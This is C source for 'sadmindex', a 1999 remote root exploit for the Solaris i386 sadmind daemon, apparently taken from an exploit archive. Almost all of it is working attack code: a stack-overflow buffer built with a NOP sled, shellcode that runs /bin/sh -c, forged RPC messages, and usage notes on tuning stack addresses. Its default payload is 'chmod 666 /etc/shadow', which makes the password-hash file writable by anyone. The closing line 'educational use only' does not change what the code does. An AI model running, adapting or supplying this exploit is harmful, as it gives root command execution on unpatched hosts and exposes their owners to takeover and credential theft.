home *** CD-ROM | disk | FTP | other *** search
- /**
- *** sadmindex - i386 Solaris remote root exploit for /usr/sbin/sadmind
- ***
- *** Tested and confirmed under Solaris 2.6 and 7.0 (i386)
- ***
- *** Usage: % sadmindex -h hostname -c command -s sp -j junk [-o offset] \
- *** [-a alignment] [-p]
- ***
- *** where hostname is the hostname of the machine running the vulnerable
- *** system administration daemon, command is the command to run as root
- *** on the vulnerable machine, sp is the %esp stack pointer value, junk
- *** is the number of bytes needed to fill the target stack frame (which
- *** should be a multiple of 4), offset is the number of bytes to add to
- *** sp to calculate the desired return address, and alignment is the
- *** number of bytes needed to correctly align the contents of the exploit
- *** buffer.
- ***
- *** If run with a -p option, the exploit will only "ping" sadmind on the
- *** remote machine to start it running. The daemon will be otherwise
- *** untouched. Since pinging the daemon does not require an exploit
- *** buffer to be constructed, you can safely omit the -c, -s, and -j
- *** options if you use -p.
- ***
- *** When specifying a command, be sure to pass it to the exploit as a
- *** single argument, namely enclose the command string in quotes if it
- *** contains spaces or other special shell delimiter characters. The
- *** exploit will pass this string without modification to /bin/sh -c on
- *** the remote machine, so any normally allowed Bourne shell syntax is
- *** also allowed in the command string. The command string and the
- *** assembly code to run it must fit inside a buffer of 512 bytes, so
- *** the command string has a maximum length of about 390 bytes or so.
- ***
- *** I have provided confirmed %esp stack pointer values for Solaris on a
- *** Pentium PC system running Solaris 2.6 5/98 and on a Pentium PC system
- *** running Solaris 7.0 10/98. On each system, sadmind was started from
- *** an instance of inetd that was started at boot time by init. There
- *** is a fair possibility that the demonstration values will not work
- *** due to differing sets of environment variables, for example if the
- *** the running inetd on the remote machine was started manually from an
- *** interactive shell. If you find that the sample value for %esp does
- *** not work, try adjusting the value by -2048 to 2048 from the sample in
- *** increments of 32 for starters. The junk parameter seems to vary from
- *** version to version, but the sample values should be appropriate for
- *** the listed versions and are not likely to need adjustment. The offset
- *** parameter and the alignment parameter have default values that will be
- *** used if no overriding values are specified on the command line. The
- *** default values should be suitable and it will not likely be necessary
- *** to override them.
- ***
- *** Demonstration values for i386 Solaris:
- ***
- *** (2.6) sadmindex -h host.example.com -c "touch HEH" -s 0x080418ec -j 512
- *** (7.0) sadmindex -h host.example.com -c "touch HEH" -s 0x08041798 -j 536
- ***
- *** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
- ***
- *** Cheez Whiz
- *** cheezbeast@hotmail.com
- ***
- *** June 24, 1999
- **/
-
- #include <stdlib.h>
- #include <stdio.h>
- #include <unistd.h>
- #include <string.h>
- #include <rpc/rpc.h>
-
- #define NETMGT_PROG 100232
- #define NETMGT_VERS 10
- #define NETMGT_PROC_PING 0
- #define NETMGT_PROC_SERVICE 1
-
- #define NETMGT_UDP_PING_TIMEOUT 30
- #define NETMGT_UDP_PING_RETRY_TIMEOUT 5
- #define NETMGT_UDP_SERVICE_TIMEOUT 1
- #define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2
-
- #define NETMGT_HEADER_TYPE 6
- #define NETMGT_ARG_INT 3
- #define NETMGT_ARG_STRING 9
- #define NETMGT_ENDOFARGS "netmgt_endofargs"
-
- #define ADM_FW_VERSION "ADM_FW_VERSION"
- #define ADM_CLIENT_DOMAIN "ADM_CLIENT_DOMAIN"
- #define ADM_FENCE "ADM_FENCE"
-
- #define BUFLEN 1056 /* 548+8+512-12 */
- #define ADDRLEN 8
- #define LEN 76
-
- /* #define JUNK 512 */ /* 524-12 (Solaris 2.6) */
- /* #define JUNK 536 */ /* 548-12 (Solaris 7.0) */
- #define OFFSET 572 /* default offset */
- #define ALIGNMENT 0 /* default alignment */
-
- #define NOP 0x90
-
- char shell[] =
- /* 0 */ "\xeb\x45" /* jmp springboard [2000]*/
- /* syscall: [2000]*/
- /* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 [2000]*/
- /* 9 */ "\xc3" /* ret [2000]*/
- /* start: [2000]*/
- /* 10 */ "\x5e" /* popl %esi [2000]*/
- /* 11 */ "\x31\xc0" /* xor %eax,%eax [2000]*/
- /* 13 */ "\x89\x46\xb7" /* movl %eax,-0x49(%esi) */
- /* 16 */ "\x88\x46\xbc" /* movb %al,-0x44(%esi) */
- /* execve: [2000]*/
- /* 19 */ "\x31\xc0" /* xor %eax,%eax [2000]*/
- /* 21 */ "\x50" /* pushl %eax [2000]*/
- /* 22 */ "\x56" /* pushl %esi [2000]*/
- /* 23 */ "\x8b\x1e" /* movl (%esi),%ebx[2000]*/
- /* 25 */ "\xf7\xdb" /* negl %ebx [2000]*/
- /* 27 */ "\x89\xf7" /* movl %esi,%edi [2000]*/
- /* 29 */ "\x83\xc7\x10" /* addl $0x10,%edi [2000]*/
- /* 32 */ "\x57" /* pushl %edi [2000]*/
- /* 33 */ "\x89\x3e" /* movl %edi,(%esi)[2000]*/
- /* 35 */ "\x83\xc7\x08" /* addl $0x8,%edi [2000]*/
- /* 38 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
- /* 41 */ "\x89\x7e\x04" /* movl %edi,0x4(%esi) */
- /* 44 */ "\x83\xc7\x03" /* addl $0x3,%edi [2000]*/
- /* 47 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
- /* 50 */ "\x89\x7e\x08" /* movl %edi,0x8(%esi) */
- /* 53 */ "\x01\xdf" /* addl %ebx,%edi [2000]*/
- /* 55 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
- /* 58 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
- /* 61 */ "\xb0\x3b" /* movb $0x3b,%al [2000]*/
- /* 63 */ "\xe8\xbe\xff\xff\xff" /* call syscall [2000]*/
- /* 68 */ "\x83\xc4\x0c" /* addl $0xc,%esp [2000]*/
- /* springboard: [2000]*/
- /* 71 */ "\xe8\xbe\xff\xff\xff" /* call start [2000]*/
- /* data: [2000]*/
- /* 76 */ "\xff\xff\xff\xff" /* DATA [2000]*/
- /* 80 */ "\xff\xff\xff\xff" /* DATA [2000]*/
- /* 84 */ "\xff\xff\xff\xff" /* DATA [2000]*/
- /* 88 */ "\xff\xff\xff\xff" /* DATA [2000]*/
- /* 92 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA [2000]*/
- /* 100 */ "\x2d\x63\xff"; /* DATA [2000]*/
-
- extern char *optarg;
-
- struct nm_send_header
- {
- struct timeval timeval1;
- struct timeval timeval2;
- struct timeval timeval3;
- unsigned int uint1;
- unsigned int uint2;
- unsigned int uint3;
- unsigned int uint4;
- unsigned int uint5;
- struct in_addr inaddr1;
- struct in_addr inaddr2;
- unsigned long ulong1;
- unsigned long ulong2;
- struct in_addr inaddr3;
- unsigned long ulong3;
- unsigned long ulong4;
- unsigned long ulong5;
- struct timeval timeval4;
- unsigned int uint6;
- struct timeval timeval5;
- char *string1;
- char *string2;
- char *string3;
- unsigned int uint7;
- };
-
- struct nm_send_arg_int
- {
- char *string1;
- unsigned int uint1;
- unsigned int uint2;
- int int1;
- unsigned int uint3;
- unsigned int uint4;
- };
-
- struct nm_send_arg_string
- {
- char *string1;
- unsigned int uint1;
- unsigned int uint2;
- char *string2;
- unsigned int uint3;
- unsigned int uint4;
- };
-
- struct nm_send_footer
- {
- char *string1;
- };
-
- struct nm_send
- {
- struct nm_send_header header;
- struct nm_send_arg_int version;
- struct nm_send_arg_string string;
- struct nm_send_arg_int fence;
- struct nm_send_footer footer;
- };
-
- struct nm_reply
- {
- unsigned int uint1;
- unsigned int uint2;
- char *string1;
- };
-
- bool_t
- xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)
- {
- char *addr;
- size_t size = sizeof(struct in_addr);
-
- if (!xdr_long(xdrs, &objp->timeval1.tv_sec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval1.tv_usec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval2.tv_sec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval2.tv_usec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval3.tv_sec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval3.tv_usec))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint2))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint3))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint4))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint5))
- return (FALSE);
- addr = (char *) &objp->inaddr1.s_addr;
- if (!xdr_bytes(xdrs, &addr, &size, size))
- return (FALSE);
- addr = (char *) &objp->inaddr2.s_addr;
- if (!xdr_bytes(xdrs, &addr, &size, size))
- return (FALSE);
- if (!xdr_u_long(xdrs, &objp->ulong1))
- return (FALSE);
- if (!xdr_u_long(xdrs, &objp->ulong2))
- return (FALSE);
- addr = (char *) &objp->inaddr3.s_addr;
- if (!xdr_bytes(xdrs, &addr, &size, size))
- return (FALSE);
- if (!xdr_u_long(xdrs, &objp->ulong3))
- return (FALSE);
- if (!xdr_u_long(xdrs, &objp->ulong4))
- return (FALSE);
- if (!xdr_u_long(xdrs, &objp->ulong5))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval4.tv_sec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval4.tv_usec))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint6))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval5.tv_sec))
- return (FALSE);
- if (!xdr_long(xdrs, &objp->timeval5.tv_usec))
- return (FALSE);
- if (!xdr_wrapstring(xdrs, &objp->string1))
- return (FALSE);
- if (!xdr_wrapstring(xdrs, &objp->string2))
- return (FALSE);
- if (!xdr_wrapstring(xdrs, &objp->string3))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint7))
- return (FALSE);
- return (TRUE);
- }
-
- bool_t
- xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)
- {
- if (!xdr_wrapstring(xdrs, &objp->string1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint2))
- return (FALSE);
- if (!xdr_int(xdrs, &objp->int1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint3))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint4))
- return (FALSE);
- return (TRUE);
- }
-
- bool_t
- xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)
- {
- if (!xdr_wrapstring(xdrs, &objp->string1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint2))
- return (FALSE);
- if (!xdr_wrapstring(xdrs, &objp->string2))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint3))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint4))
- return (FALSE);
- return (TRUE);
- }
-
- bool_t
- xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)
- {
- if (!xdr_wrapstring(xdrs, &objp->string1))
- return (FALSE);
- return (TRUE);
- }
-
- bool_t
- xdr_nm_send(XDR *xdrs, struct nm_send *objp)
- {
- if (!xdr_nm_send_header(xdrs, &objp->header))
- return (FALSE);
- if (!xdr_nm_send_arg_int(xdrs, &objp->version))
- return (FALSE);
- if (!xdr_nm_send_arg_string(xdrs, &objp->string))
- return (FALSE);
- if (!xdr_nm_send_arg_int(xdrs, &objp->fence))
- return (FALSE);
- if (!xdr_nm_send_footer(xdrs, &objp->footer))
- return (FALSE);
- return (TRUE);
- }
-
- bool_t
- xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)
- {
- if (!xdr_u_int(xdrs, &objp->uint1))
- return (FALSE);
- if (!xdr_u_int(xdrs, &objp->uint2))
- return (FALSE);
- if (!xdr_wrapstring(xdrs, &objp->string1))
- return (FALSE);
- return (TRUE);
- }
-
- int
- main(int argc, char *argv[])
- {
- CLIENT *cl;
- struct nm_send send;
- struct nm_reply reply;
- struct timeval tm;
- enum clnt_stat stat;
- int c, i, len, slen, clen;
- char *program, *cp, buf[BUFLEN+1];
- char *hostname, *command;
- int junk = 0, offset, alignment, pinging = 0;
- unsigned long int sp = 0, addr;
-
- program = argv[0];
- hostname = "localhost";
- command = "chmod 666 /etc/shadow";
- offset = OFFSET;
- alignment = ALIGNMENT;
- while ((c = getopt(argc, argv, "h:c:s:j:o:a:p")) != EOF)
- {
- switch (c)
- {
- case 'h':
- hostname = optarg;
- break;
- case 'c':
- command = optarg;
- break;
- case 's':
- sp = strtoul(optarg, NULL, 0);
- break;
- case 'j':
- junk = (int) strtol(optarg, NULL, 0);
- break;
- case 'o':
- offset = (int) strtol(optarg, NULL, 0);
- break;
- case 'a':
- alignment = (int) strtol(optarg, NULL, 0);
- break;
- case 'p':
- pinging = 1;
- break;
- default:
- fprintf(stderr, "usage: %s -h hostname -c command -s sp -j junk "
- "[-o offset] [-a alignment] [-p]\n", program);
- exit(1);
- break;
- }
- }
- memset(buf, NOP, BUFLEN);
- junk &= 0xfffffffc;
- for (i = 0, cp = buf + alignment; i < junk / 4; i++)
- {
- *cp++ = (sp >> 0) & 0xff;
- *cp++ = (sp >> 8) & 0xff;
- *cp++ = (sp >> 16) & 0xff;
- *cp++ = (sp >> 24) & 0xff;
- }
- addr = sp + offset;
- for (i = 0; i < ADDRLEN / 4; i++)
- {
- *cp++ = (addr >> 0) & 0xff;
- *cp++ = (addr >> 8) & 0xff;
- *cp++ = (addr >> 16) & 0xff;
- *cp++ = (addr >> 24) & 0xff;
- }
- slen = strlen(shell);
- clen = strlen(command);
- len = clen;
- len++;
- len = -len;
- shell[LEN+0] = (len >> 0) & 0xff;
- shell[LEN+1] = (len >> 8) & 0xff;
- shell[LEN+2] = (len >> 16) & 0xff;
- shell[LEN+3] = (len >> 24) & 0xff;
- cp = buf + BUFLEN - 1 - clen - slen;
- memcpy(cp, shell, slen);
- cp += slen;
- memcpy(cp, command, clen);
- cp += clen;
- *cp = '\xff';
- buf[BUFLEN] = '\0';
- memset(&send, 0, sizeof(struct nm_send));
- send.header.uint2 = NETMGT_HEADER_TYPE;
- send.header.string1 = "";
- send.header.string2 = "";
- send.header.string3 = "";
- send.header.uint7 =
- strlen(ADM_FW_VERSION) + 1 +
- (4 * sizeof(unsigned int)) + sizeof(int) +
- strlen(ADM_CLIENT_DOMAIN) + 1 +
- (4 * sizeof(unsigned int)) + strlen(buf) + 1 +
- strlen(ADM_FENCE) + 1 +
- (4 * sizeof(unsigned int)) + sizeof(int) +
- strlen(NETMGT_ENDOFARGS) + 1;
- send.version.string1 = ADM_FW_VERSION;
- send.version.uint1 = NETMGT_ARG_INT;
- send.version.uint2 = sizeof(int);
- send.version.int1 = 1;
- send.string.string1 = ADM_CLIENT_DOMAIN;
- send.string.uint1 = NETMGT_ARG_STRING;
- send.string.uint2 = strlen(buf);
- send.string.string2 = buf;
- send.fence.string1 = ADM_FENCE;
- send.fence.uint1 = NETMGT_ARG_INT;
- send.fence.uint2 = sizeof(int);
- send.fence.int1 = 666;
- send.footer.string1 = NETMGT_ENDOFARGS;
- cl = clnt_create(hostname, NETMGT_PROG, NETMGT_VERS, "udp");
- if (cl == NULL)
- {
- clnt_pcreateerror("clnt_create");
- exit(1);
- }
- cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
- if (!pinging)
- {
- fprintf(stdout,
- "%%esp 0x%08lx offset %d --> return address 0x%08lx [%d+%d]\n",
- sp, offset, addr, alignment, junk);
- tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT;
- tm.tv_usec = 0;
- if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
- {
- fprintf(stderr, "exploit failed; unable to set timeout\n");
- exit(1);
- }
- tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT;
- tm.tv_usec = 0;
- if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
- {
- fprintf(stderr, "exploit failed; unable to set timeout\n");
- exit(1);
- }
- stat = clnt_call(cl, NETMGT_PROC_SERVICE,
- xdr_nm_send, (caddr_t) &send,
- xdr_nm_reply, (caddr_t) &reply, tm);
- if (stat != RPC_SUCCESS)
- {
- clnt_perror(cl, "clnt_call");
- fprintf(stdout, "now check if exploit worked; "
- "RPC failure was expected\n");
- exit(0);
- }
- fprintf(stderr, "exploit failed; "
- "RPC succeeded and returned { %u, %u, \"%s\" }\n",
- reply.uint1, reply.uint2, reply.string1);
- clnt_destroy(cl);
- exit(1);
- }
- else
- {
- tm.tv_sec = NETMGT_UDP_PING_TIMEOUT;
- tm.tv_usec = 0;
- if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
- {
- fprintf(stderr, "exploit failed; unable to set timeout\n");
- exit(1);
- }
- tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT;
- tm.tv_usec = 0;
- if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
- {
- fprintf(stderr, "exploit failed; unable to set timeout\n");
- exit(1);
- }
- stat = clnt_call(cl, NETMGT_PROC_PING,
- xdr_void, NULL,
- xdr_void, NULL, tm);
- if (stat != RPC_SUCCESS)
- {
- clnt_perror(cl, "clnt_call");
- exit(1);
- }
- clnt_destroy(cl);
- exit(0);
- }
- }
- /* www.hack.co.za */
-